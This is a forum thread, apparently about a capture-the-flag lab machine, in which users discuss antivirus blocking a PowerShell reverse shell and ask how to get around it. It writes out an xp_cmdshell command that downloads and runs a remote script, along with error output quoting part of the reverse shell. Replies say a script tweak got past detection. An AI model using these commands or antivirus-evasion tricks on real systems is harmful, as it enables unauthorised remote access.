ARCHETYPE Antivirus Blocking Reverse Shell

I have rooted the box, but not without first running into a situation where antivirus blocked the powershell script one-liner I initially chose for the reverse shell (powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub). My one-liner looked very similar to the one in the walkthrough (which I eventually used successfully).

Just curious if anyone ran into the same thing and how you got past this roadblock. I tried tweaking names of variables of my script as well as tried generating completely different payloads through msfvenom but had no success.

I’m also not sure why a box that could require antivirus evasion is marked as an easy box.

1> xp_cmdshell “powershell IEX (New-Object System.Net.WebClient).DownloadString(‘’);”
2> go
output: IEX : At line:1 char:1

output: + $c = New-Object System.Net.Sockets.TCPClient(“”,443);$s = …

output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

output: This script contains malicious content and has been blocked by your antivirus software.

output: At line:1 char:1

output: + IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14

output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

output: + CategoryInfo : ParserError: (:slight_smile: [Invoke-Expression], ParseException

output: + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand


output: NULL

I happened to have the same issue. If I removed the


in the script and replace it with


then it will work.

It is weird that the original script worked for some days and the next day when I tried it, it start to not working.

same here, yesterday the shell works, today not… very confusing…